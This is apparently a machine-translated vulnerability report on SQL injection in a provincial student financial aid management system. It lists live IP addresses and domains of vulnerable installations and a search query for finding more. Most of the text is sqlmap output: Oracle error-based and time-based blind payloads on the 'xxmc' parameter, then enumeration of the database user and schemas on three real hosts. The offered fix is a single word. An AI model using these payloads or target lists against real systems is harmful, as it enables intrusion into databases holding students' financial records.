A common SQL injection vulnerability exists in the financial aid management system of multiple provinces.

A common SQL injection vulnerability exists in the financial aid management system of multiple provinces.

In a certain province, the financial aid management system has the SQL injection vulnerability. In addition to glyxm injection, xxmc injection exists.

Http://music.google.cn/search? Newwindow = 1 & q = infoms % 2 Fidentity % 2Findex. c & btnG = Google + % E6 % 90% 9C % E7 % B4 % A2



Nanjing jundu Technology Co., Ltd.



Some examples



Http: // 220.178.0.180/infoms/identity/index. c



Http: // 218.76.27.109/infoms/identity/index. c



Http://aid.ec.js.edu.cn/infoms/identity/index.c



Http: // 202.119.175.107/infoms/identity/index. c



Http: // 58.213.129.204/infoms/



Http: // 58.213.129.204/infoms/visitor/getKpzh-list.c? Glyxm = 1 & wdl = & xxmc = 1

 

Http: // 58.213.129.204/infoms/visitor/getKpzh-list.c? Glyxm = 1 & wdl = & xxmc = 1



Place: GET

Parameter: xxmc

Type: error-based

Title: Oracle AND error-based-WHERE or HAVING clause (XMLType)

Payload: glyxm = 1 & wdl = & xxmc = 1' AND 4873 = (select upper (XMLType (CHR (60) | CHR (58

) | CHR (98) | CHR (121) | CHR (109) | CHR (58) | (SELECT (case when (4873 = 4873) THEN 1 E

LSE 0 END) from dual) | CHR (58) | CHR (110) | CHR (112) | CHR (107) | CHR (58) | CHR (62 )))

From dual) AND 'gyta '= 'gyta



Type: AND/OR time-based blind

Title: Oracle AND time-based blind

Payload: glyxm = 1 & wdl = & xxmc = 1 'AND 9115 = DBMS_PIPE.RECEIVE_MESSAGE (CHR (119) | C

HR (97) | CHR (76) | CHR (69), 5) AND 'bsgg' = 'bsgg

---

There were multiple injection points, please select the one to use for following

Injections:

[0] place: GET, parameter: xxmc, type: Single quoted string (default)

[1] place: GET, parameter: glyxm, type: Single quoted string

[Q] Quit

> 0



[21:19:02] [INFO] the back-end DBMS is Oracle

Web application technology: Nginx, JSP

Back-end DBMS: Oracle

[21:19:02] [INFO] fetching current user

[21:19:02] [INFO] retrieved: USR_LOAN

Current user: 'usr _ loan'

[21:19:02] [INFO] fetching current database

[21:19:02] [INFO] resumed: USR_LOAN

Current schema (equivalent to database on Oracle): 'usr _ loan'

[21:19:02] [WARNING] schema names are going to be used on Oracle for enumeration

As the counterpart to database names on other DBMSes

[21:19:02] [INFO] fetching database (schema) names

[21:19:02] [INFO] the SQL query used returns 20 entries

[21:19:03] [INFO] retrieved: CTXSYS

[21:19:04] [INFO] retrieved: DBSNMP

[21:19:04] [INFO] retrieved: DMSYS

[21:19:05] [INFO] retrieved: EXFSYS

[21:19:05] [INFO] retrieved: MDSYS

[21:19:06] [INFO] retrieved: OLAPSYS

[21:19:06] [INFO] retrieved: ORDSYS

[21:19:07] [INFO] retrieved: OUTLN

[21:19:07] [INFO] retrieved: SYS

[21:19:08] [INFO] retrieved: SYSMAN

[21:19:08] [INFO] retrieved: SYSTEM

[21:19:09] [INFO] retrieved: TSMSYS

[21:19:09] [INFO] retrieved: USR_JCMS

[21:19:10] [INFO] retrieved: USR_JIANGSU

[21:19:10] [INFO] retrieved: USR_LOAN

[21:19:11] [INFO] retrieved: USR_LOAN_TEST

[21:19:11] [INFO] retrieved: USR_ZJ

[21:19:11] [INFO] retrieved: VIDEO

[21:19:12] [INFO] retrieved: WMSYS

[21:19:12] [INFO] retrieved: XDB



Http: // 202.119.175.107/infoms/visitor/getKpzh-list.c? Glyxm = 1 & wdl = & xxmc = 1



Place: GET

Parameter: xxmc

Type: error-based

Title: Oracle AND error-based-WHERE or HAVING clause (XMLType)

Payload: glyxm = 1 & wdl = & xxmc = 1' AND 5005 = (select upper (XMLType (CHR (60) | CHR (58

) | CHR (117) | CHR (107) | CHR (117) | CHR (58) | (SELECT (case when (5005 = 5005) THEN 1

ELSE 0 END) from dual) | CHR (58) | CHR (116) | CHR (113) | CHR (102) | CHR (58) | CHR (62 ))

) From dual) AND 'ovnr '= 'ovnr



Type: AND/OR time-based blind

Title: Oracle AND time-based blind

Payload: glyxm = 1 & wdl = & xxmc = 1 'AND 8587 = DBMS_PIPE.RECEIVE_MESSAGE (CHR (97) | CH

R (120) | CHR (88) | CHR (68), 5) AND 'trmp' = 'trmp

---

[21:20:03] [INFO] the back-end DBMS is Oracle

Web application technology: Nginx, JSP

Back-end DBMS: Oracle

[21:20:03] [INFO] fetching current user

[21:20:03] [INFO] retrieved: USR_LOAN

Current user: 'usr _ loan'

[21:20:03] [INFO] fetching current database

[21:20:03] [INFO] resumed: USR_LOAN

Current schema (equivalent to database on Oracle): 'usr _ loan'

[21:20:03] [WARNING] schema names are going to be used on Oracle for enumeration

As the counterpart to database names on other DBMSes

[21:20:03] [INFO] fetching database (schema) names

[21:20:04] [INFO] the SQL query used returns 20 entries

[21:20:04] [INFO] retrieved: CTXSYS

[21:20:04] [INFO] retrieved: DBSNMP

[21:20:05] [INFO] retrieved: DMSYS

[21:20:05] [INFO] retrieved: EXFSYS

[21:20:06] [INFO] retrieved: MDSYS

[21:20:06] [INFO] retrieved: OLAPSYS

[21:20:06] [INFO] retrieved: ORDSYS

[21:20:07] [INFO] retrieved: OUTLN

[21:20:07] [INFO] retrieved: SYS

[21:20:08] [INFO] retrieved: SYSMAN

[21:20:08] [INFO] retrieved: SYSTEM

[21:20:08] [INFO] retrieved: TSMSYS

[21:20:12] [INFO] retrieved: USR_JCMS

[21:20:12] [INFO] retrieved: USR_JIANGSU

[21:20:13] [INFO] retrieved: USR_LOAN

[21:20:13] [INFO] retrieved: USR_LOAN_TEST

[21:20:14] [INFO] retrieved: USR_ZJ

[21:20:14] [INFO] retrieved: VIDEO

[21:20:15] [INFO] retrieved: WMSYS

[21:20:15] [INFO] retrieved: XDB





Http://aid.ec.js.edu.cn/infoms/visitor/getKpzh-list.c? Glyxm = 1 & wdl = & xxmc = 1



Place: GET

Parameter: xxmc

Type: error-based

Title: Oracle AND error-based-WHERE or HAVING clause (XMLType)

Payload: glyxm = 1 & wdl = & xxmc = 1' AND 7775 = (select upper (XMLType (CHR (60) | CHR (58

) | CHR (107) | CHR (111) | CHR (114) | CHR (58) | (SELECT (case when (7775 = 7775) THEN 1

ELSE 0 END) from dual) | CHR (58) | CHR (106) | CHR (98) | CHR (116) | CHR (58) | CHR (62 )))

From dual) AND 'yvpq '= 'yvpq



Type: AND/OR time-based blind

Title: Oracle AND time-based blind

Payload: glyxm = 1 & wdl = & xxmc = 1 'AND 9630 = DBMS_PIPE.RECEIVE_MESSAGE (CHR (75) | CH

R (99) | CHR (70) | CHR (101), 5) AND 'tvtr' = 'tvtr

---

[21:21:35] [INFO] the back-end DBMS is Oracle

Web application technology: Nginx, JSP

Back-end DBMS: Oracle

[21:21:35] [INFO] fetching current user

[21:21:35] [INFO] retrieved: USR_LOAN

Current user: 'usr _ loan'

[21:21:35] [INFO] fetching current database

[21:21:35] [INFO] resumed: USR_LOAN

Current schema (equivalent to database on Oracle): 'usr _ loan'

[21:21:35] [WARNING] schema names are going to be used on Oracle for enumeration

As the counterpart to database names on other DBMSes

[21:21:35] [INFO] fetching database (schema) names

[21:21:35] [INFO] the SQL query used returns 20 entries

[21:21:36] [INFO] retrieved: CTXSYS

[21:21:36] [INFO] retrieved: DBSNMP

[21:21:37] [INFO] retrieved: DMSYS

[21:21:37] [INFO] retrieved: EXFSYS

[21:21:37] [INFO] retrieved: MDSYS

[21:21:38] [INFO] retrieved: OLAPSYS

[21:21:38] [INFO] retrieved: ORDSYS

[21:21:38] [INFO] retrieved: OUTLN

[21:21:39] [INFO] retrieved: SYS

[21:21:39] [INFO] retrieved: SYSMAN

[21:21:40] [INFO] retrieved: SYSTEM

[21:21:40] [INFO] retrieved: TSMSYS

[21:21:41] [INFO] retrieved: USR_JCMS

[21:21:41] [INFO] retrieved: USR_JIANGSU

[21:21:42] [INFO] retrieved: USR_LOAN

[21:21:42] [INFO] retrieved: USR_LOAN_TEST

[21:21:43] [INFO] retrieved: USR_ZJ

[21:21:43] [INFO] retrieved: VIDEO

[21:21:44] [INFO] retrieved: WMSYS

[21:21:44] [INFO] retrieved: XDB

Available databases [20]:

[*] CTXSYS

[*] DBSNMP

[*] DMSYS

[*] EXFSYS

[*] MDSYS

[*] OLAPSYS

[*] ORDSYS

[*] OUTLN

[*] SYS

[*] SYSMAN

[*] SYSTEM

[*] TSMSYS

[*] USR_JCMS

[*] USR_JIANGSU

[*] USR_LOAN

[*] USR_LOAN_TEST

[*] USR_ZJ

[*] VIDEO

[*] WMSYS

[*] XDB






 

Solution:

Filter